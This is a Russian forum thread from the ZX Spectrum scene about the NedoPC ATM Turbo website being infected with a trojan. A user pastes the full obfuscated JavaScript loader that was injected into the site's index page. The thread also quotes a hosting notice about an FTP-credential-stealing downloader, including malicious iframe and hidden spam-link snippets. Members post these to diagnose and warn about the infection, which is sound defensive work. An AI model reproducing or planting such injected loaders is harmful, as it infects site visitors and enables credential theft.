На сайте группы Nedo PC (http://www.nedopc.com/), подразделе АТМ (atmturbo.nedopc.КОМ) сидит сильный ТРОЯН !!!

Проверял с разных интернетов и компов в течении сегодняшнего дня. Везде сработка.

да, есть такое дело.. Avira отлавливает, но Firefox закрывается

На сайте группы Nedo PC (http://www.nedopc.com/), подразделе АТМ (atmturbo.nedopc.КОМ) сидит сильный ТРОЯН !!!

Проверял с разных интернетов и компов в течении сегодняшнего дня. Везде сработка.

А по мылу мне написатьили позвонить слабо чтоли... Теперь токо вечером смогу исправить :(.

А по мылу мне написатьили позвонить слабо чтоли... Теперь токо вечером смогу исправить

Я думал ты не бог АТМ. А бог центрального недописи.

Я думал ты не бог АТМ. А бог центрального недописи.

Не я не БОГ, но хостинг у меня и я имею доступ ко всем поддоменам :)
Так что ко мне вопросы.
Сейчас лечением займусь!

Не я не БОГ, но хостинг у меня и я имею доступ ко всем поддоменам
Так что ко мне вопросы.
Сейчас лечением займусь!

Хорошо, а то мне щас часто лазить туда придется по вопросам атээмста.

Хорошо, а то мне щас часто лазить туда придется по вопросам атээмста.

ПРоверяйте!
ВОобщем проблема была судя по всему у провайдера.

http://ipicture.ru/uploads/080711/5CQYYhtT75.jpg

Проверил в 20:41 троян прекрасно работает. Сбоев в его работе нет. Программа написана хорошим троянистом со знанием дела.

Попробуй удалить индекс и записать нетроянистый заново. Если опять строянит, значит там глюк.

Это где-то конкретно, или на всем http://atmturbo.nedopc.com/ ? У мну аваст не ругается.

Это где-то конкретно, или на всем http://atmturbo.nedopc.com/ ? У мну аваст не ругается.

Конкретно когда с общего недописи переходишь по верхней ссылке на АТМ подразделение корпорации нанотехнологий Недо ПИСИ.

http://ipicture.ru/uploads/080711/83DaV8Xa6F.jpg

Идет переадресация на этот адрес (ХТТП://iwi5fgves.com/cgi-bin/index.cgi?dx) и срабатывает антивирус. Тоесть либо в индексе, либо у провайдера в движке сидит кака.

Добавлено через 4 минуты

У мну аваст не ругается.

У меня уже тоже не ругается, так как занес адрес в каковые адреса.

Только что очистил реестр и снова проверил. Вирус срабатывает еще на странице:

CHRV обрати внимание на этот текст внизу своей индексовой страницы:

<script language="javascript">$="%64b%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7 f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27%3c (%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudT%22;dd%3d%22iSx%2522%3c }Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K 7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950%25265##950%2522%252 6M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209%22;dz %3d%22%2566unc%2574%2569on%2520dw(%2574)%257bca%25 3d%2527%252564oc%252575m%2565n%252574.w%25257%2532 i%2574%252565%2528%252522%2527;ce%253d%2527%252522 )%2527;cb%253d%2527%25253csc%252572ipt%252520%256c %25256%2531ngu%252561%2567e%25253d%25255c%252522ja %2576a%252573c%2572i%252570%252574%25255c%252522%2 5253e%2527;cc%253d%2527%25253c%2525%2535%2563%2525 2fs%2563%2572i%2570t%25253e%2527;eval%2528%2575nes %2563ape%2528t))%257d%253b%22;cd%3d%223dst+%2553tr %2569n%2567.f%2572%256fmCh%2561rC%256f%2564e((%257 4%256d%2570.%2563h%22;cc%3d%225ngt%2568;i%252b+)%2 57bt%256dp%253dds.%2573%256ci%2563e%2528i,i%252b1) %253bst%25%22;cb%3d%22e%2528ds%2529;%2573t%253dt%2 56dp%253d%2527%2527;for(%2569%253d%2530;i%253cds.l %256%22;cu%3d%22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4% 3czub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dobuf4d%7bdKa zpqf4)4zaxx%2fbuf4d%7bdKw%7b%7b%257F}qKzuyq4)46upb yu%257FqfK%257F%7byud6%2fbuf4d%7bdK`}yq%7ba`4)4#%2 526$%2frazw`}%7bz4d%7bdKw%7b%7b%257F}qKqzuvxqp%3c% 3dobuf4}gKqzuvxqp4)4ruxgq%2f}r4%3c5c}zp%7bc:%7bdqf u42245zub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dfq`afz4} gKqzuvxqp%2f}r4%3c`mdq%7br4p%7bwayqz`:w%7b%7b%257F }q4))43g`f}zs3%3d}r4%3cp%7bwayqz`:w%7b%7b%257F}q:x qzs`|4))4$%3dop%7bwayqz`:w%7b%7b%257F}q4)46`qg`6%2 f}gKqzuvxqp4)4p%7bwayqz`:w%7b%7b%257F}q4))43`qg`3% 2fp%7bwayqz`:w%7b%7b%257F}q4)433%2fiqxgqo}gKqzuvxq p4)4`faq%2fifq`afz4}gKqzuvxqp%2firazw`}%7bz4d%7bdK sq`W%7b%7b%257F}q%3czuyq%3dobuf4w%7b%7b%257F}q4)46 464?4p%7bwayqz`:w%7b%7b%257F}q%2fbuf4gqufw|4)46464 ?4zuyq4?46)6%2fbuf4gq`G`f4)4zaxx%2fbuf4%7brrgq`4)4 $%2fbuf4qzp4)4$%2f}r4%3cw%7b%7b%257F}q:xqzs`|4*4$% 3do%7brrgq`4)4w%7b%7b%257F}q:}zpql[r%3cgqufw|%3d%2f}r4%3c%7brrgq`45)49%25%3do%7brrgq` 4?)4gqufw|:xqzs`|%2fqzp4)4w%7b%7b%257F}q:}zpql[r%3c6%2f684%7brrgq`%3d%2f}r4%3cqzp4))49%25%3doqzp4 )4w%7b%7b%257F}q:xqzs`|%2figq`G`f4)4azqgwudq%3cw%7 b%7b%257F}q:gavg`f}zs%3c%7brrgq`84qzp%3d%3d%2fiifq `afz%3cgq`G`f%3d%2firazw`}%7bz4d%7bdKgq`W%7b%7b%25 7F}q4%3czuyq84buxaq%3dop%7bwayqz`:w%7b%7b%257F}q4) 4zuyq4?46)64?4qgwudq%3cbuxaq%3d4?46%2f4qld}fqg)Rf} pum8%27%259Pqw9!$4%2526%27.!-.!-4SY@%2f4du`|);%2f6%2firazw`}%7bz4g|%7bcKd%7bd%3c%3 dobuf4d%7bdKczp4)46|``d.;;rvwyr}f:w%7by;ws}9v}z;}z pql:ws}+pl6%2fbuf4rquKczp4)46gwf%7bxxvufg)%258fqg} nuvxq)%258`%7b%7bxvuf)%258x%7bwu`}%7bz)%258yqzavuf )%258g`u`ag)%258p}fqw`%7bf}qg)$6%2fbuf4zqqpK%7bdqz 4)4`faq%2f}r4%3cp%7bwayqz`:%7bzwx}w%257FKw%7bdm45) 4zaxx%3dp%7bwayqz`:%7bzwx}w%257FKw%7bdm%3c%3d%2f}r 4%3cp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm4 5)4zaxx%3dp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw %7bdm%3c%3d%2f}r4%3cd%7bdKazpqf45)4zaxx%3do}r4%3c5 d%7bdKazpqf:wx%7bgqp%3dzqqpK%7bdqz4)4ruxgq%2fi}r4% 3czqqpK%7bdqz%3do}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxq p%3c%3d%3dobux4)4d%7bdKsq`W%7b%7b%257F}q%3cd%7bdKw %7b%7b%257F}qKzuyq%3d%2f}r4%3cbux45)4zaxx%3doz%7bc 4)4zqc4Pu`q%3c%3d%2fbux%25264)4zqc4Pu`q%3cbux%3d%2 fa`w%27%25264)4Pu`q:A@W%3cz%7bc:sq`RaxxMquf%3c%3d8 4z%7bc:sq`Y%7bz`|%3c%3d84z%7bc:sq`Pu`q%3c%3d84z%7b c:sq`%255C%7bafg%3c%3d84z%7bc:sq`Y}za`qg%3c%3d84z% 7bc:sq`Gqw%7bzpg%3c%3d%3d%2fa`w%25264)4Pu`q:A@W%3c bux%2526:sq`RaxxMquf%3c%3d84bux%2526:sq`Y%7bz`|%3c %3d84bux%2526:sq`Pu`q%3c%3d84bux%2526:sq`%255C%7ba fg%3c%3d84bux%2526:sq`Y}za`qg%3c%3d84bux%2526:sq`G qw%7bzpg%3c%3d%3d%2f}r4%3c4%3c4a`w%27%2526494a`w%2 5264%3d4;4%25$$$4(4d%7bdK`}yq%7ba`%3e%2522$%3dozqq pK%7bdqz4)4ruxgq%2fiiii}r4%3czqqpK%7bdqz%3doazpqf4 )4c}zp%7bc:%7bdqz%3cd%7bdKczp846684rquKczp%3d%2faz pqf:vxaf%3c%3d%2fc}zp%7bc:r%7bwag%3c%3d%2f}r4%3cd% 7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3doz%7bc4)4zqc4Pu `q%3c%3d%2fd%7bdKgq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b %257F}qKzuyq84z%7bc%3d%2fiiirazw`}%7bz4d%7bdK}z}`% 3c%3dobuf4bqf4)4dufgqRx%7bu`%3czub}su`%7bf:uddBqfg }%7bz%3d%2fbuf4bqf%25264)4%3czub}su`%7bf:agqfUsqz` :}zpql[r%3c6C}zp%7bcg4-!6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-,6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4Z@6%3d*)$4%3d22%3czub}su`%7bf:agqfU sqz`:}zpql[r%3c3[dqfu3%3d4))49%25%3d22%3czub}su`%7bf:uddZuyq45)43Zq `gwudq3%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3YG]Q3%3d4*49%25%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3GB%253%3d4*49%25%3d422%3cbqf4*)4%2520%3d%2f}r 4%3cbqf%2526%3do}r4%3cp%7bwayqz`:x}z%257Fg%3dor%7b f4%3cbuf4})$%2f4}(p%7bwayqz`:x}z%257Fg:xqzs`|%2f4} ??%3do}r4%3cp%7bwayqz`:x}z%257FgO}I:`ufsq`45)46Kvx uz%257F6%3dop%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257FK w%7bdm4)4p%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F%2fp %7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F4)4g|%7bcKd%7b d%2fiiiip%7bwayqz`:%7bzwx}w%257FKw%7bdm4)4p%7bwayq z`:%7bzwx}w%257F%2fp%7bwayqz`:%7bzy%7bagqad4)4g|%7 bcKd%7bd%2fid%7bdK}z}`%3c%3d%2fi(;gwf}d`*%22;de%3d %22M+}Sx-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:%2526950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3 d!M;7%3es%257F}79+%22;dc%3d%22qi89;%25229+u|cu0d)K 7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209 d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vyb%3es%257F}7+fqb0iSx!%3c%22;cz%3d%22%2566u% 256ec%2574i%256fn %2563z%2528%2563%257a)%257bret%2575rn%2520c%2561%2 52b%2563%2562%252bc%2563+%2563%2564+c%2565+c%257a; }%253b%22;da%3d%22fqb0})-~ug0Qbbqi87|qe~%257F7%3c7%7brtfu7%3c7zsdxb7%3c7ytv yb7%3c7xufyv7%3c7wvhuc7%3c7vwfuc7%3c7uxwxd7%3c7tzu ~y7%3c7s%7bud~7%3c7r||uf7%3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7% 3c7x7%3c7y7%3c7z7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%25 7F7%22;ca%3d%22%2566%2575nc%2574%2569o%256e%2520dc s%2528ds%252ce%2573)%257bds%253dun%2565s%2563ap%22 ;ce%3d%22%2561%2572Co%2564e%2541t(%2530)^%2528%252 70x0%2530%2527+es%2529%2529);}%257d%22;op%3d%22%25 24%253d%2522dw(d%2563%2573(cu%252c14)%2529;%2522;% 22;st%3d%22%2573t%253d%2522$%253ds%2574%253b%2564c %2573%2528%2564a%252b%2564%2562%252b%2564%2563+%25 64%2564%252b%2564e%252c1%2530%2529;%2564w%2528%257 3t%2529%253bs%2574%253d%2524;%2522;%22;%69f %28d%6fc%75me%6et.%63ook%69%65%2eind%65%78%4f%66(% 27%76%62ull%65%74%69%6e%5f%6dult%69qu%6f%74%65%3d% 27)%3d%3d-1)%7bsc(%27vbulle%74%69%6e_%6dul%74iq%75ote%3d%27, 2,7%29;e%76a%6c%28u%6ee%73ca%70e%28dz+%63%7a+op%2b s%74)+%27dw%28dz%2bcz%28$+s%74))%3b%27)}e%6cse%7b$ %3d%27%27};function%20s%63(c%6em,%76,e%64)%7bv%61r e%78d%3dnew D%61t%65();%65xd.%73%65%74D%61%74e(%65xd.%67e%74Da %74e(%29+%65d);%64oc%75men%74%2ecoo%6bie%3dc%6em%2 b %27%3d%27 +%65sc%61%70%65(v%29+%27;e%78p%69%72es%3d%27+e%78d .%74o%47MTS%74ri%6e%67%28);}%3b";eval(unescape($));document.write($);</script></body>
</HTML>

В общем такая фигня только IE. В FF и Opera все ок.

Господа разбирающиеся в хаке, обьясните как можно на сайт без возможности аплоада (т.е. нет скриптов иньекций) внести изменения в индекс?
Возможно ли это через CGI-счетчик?

Исправил, пароли сменил...

Господа разбирающиеся в хаке, обьясните как можно на сайт без возможности аплоада (т.е. нет скриптов иньекций) внести изменения в индекс?
Возможно ли это через CGI-счетчик?

У меня этот троян был в счетчике спайлога в позо прошлом году на ундегранде. Мучал меня пока не сменил пароль доступа на фтп на более длинный. До ************

Добавлено через 44 секунды

ПРоверяйте!

сейчас все работает без вирусов.

CHRV, через счетчик навряд ли, скорее всего прова хакнули, и прошлись по файловой системе в поисках куда бы приписаться.

Собственно я своим вебмастерам (*.zxby.org) писал, продублирую и здесь:



Уведомление об опасности распространения нового вируса
----------------------------------------------------

Уважаемые абоненты!

Сообщаем, что в сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct
(возможны другия названия), распространяющий себя через веб-сайты.

Схема заражения довольно проста: достаточно зайти на зараженный
сайт и при стандартных настройках безопасности браузера, вирус
автоматически установится на компьютере пользователя.
После этого он начинает отслеживать логины и пароли от FTP,
высылая их злоумышленникам. Собрав определенное количество паролей,
запускается специальная программа, которая подключается по FTP
к каждому сайту и встраивает в начало или конец страниц собственный
html-код, например, такой:

<iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0
src=http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe-->

или

<u style=display:none><a href="http://www.streetsmarts.us/projects/media/hydrocodone/buy-hydrocodone.html">buy hydrocodone</a>
<a href="http://www.streetsmarts.us/projects/media/hydrocodone/m367-hydrocodone.html">m367 hydrocodone</a></u>

Мы просим проверить свои сайты на предмет заражения. Для этого
достаточно п исходный код главной страницы на наличия постороннего текста.

В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.
2. Проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователец FTP.

Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы,
где в качестве причин заражения указываются различные бесплатные "движки"
(phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров.
Со своей стороны можем заверить, что вирус распространяется только способом,
описанным в этом письме, и его появление не связано с проблемами безопасности
на сервере.http://zxby.org/forums/viewtopic.php?p=561#561

О как!

Некропостер :) последнему посту аш 4года уже ;)

Время быстро летит.

Сергей! Выдыхай! Выдыхай! :)

Sergei Frolov,:v2_clapp:

ВЕСЬ УНДЕГРУНД ЛЕЖИТ!!!

На ком?

На ком?

Просто не работает с утра. Все сайты не работают. И главное мой zxaaa, наверно пора валить оттуда на платное что то... Вделывать рекламу. Скоро развалится германия.

AAA, "падение" сервера и "технические работы" на них - не рассматриваются, как версия? ;)

AAA, "падение" сервера и "технические работы" на них - не рассматриваются, как версия?

германию захватили инопланетяне, это моя первая версия, они выкачивают демы.
вот видео
http://www.youtube.com/watch?v=rtu62Gklgso

вечно он падает:
http://www.pouet.net/topic.php?which=9811

AAA, так йоптыть, ролик получше фильма будет! :)

Г-н Shnurkov, оно само так вышло.
http://svalko.org/data/2014_02_27_20_48_d24w6bsrhbeh9d_cloudfront_net_pho to_av0RbVW_460sa_v1.gif

Г-н Shnurkov, оно само так вышло.
Когда она бьет, ноги уже мужские! Это фейк.

AAA, она трансформер

AAA, она трансформер
Раньше это как-то по-другому называлось! :))))))))

Раньше это как-то по-другому называлось! :))))))))

Дай угадаю - Гоу-бот? :)

Трансвестит? :)

Когда она бьет, ноги уже мужские! Это фейк.

It's a trap! ;D

http://img2.joyreactor.cc/pics/post/%D0%B3%D0%B8%D1%84%D0%BA%D0%B0-%D0%B1%D1%80%D1%8E%D1%81-%D1%83%D0%B8%D0%BB%D0%BB%D0%B8%D1%81-bailey-jay-it's-a-trap-526762.gif

А, всего-то в Wordpress дыру нашли. когда починят уже?
ААА, нужны демы!

А, всего-то в Wordpress дыру нашли. когда починят уже?
ААА, нужны демы!
ЭТА отныне составляет около 18 часов. Так untergrund.net должен вернуться завтра вечером.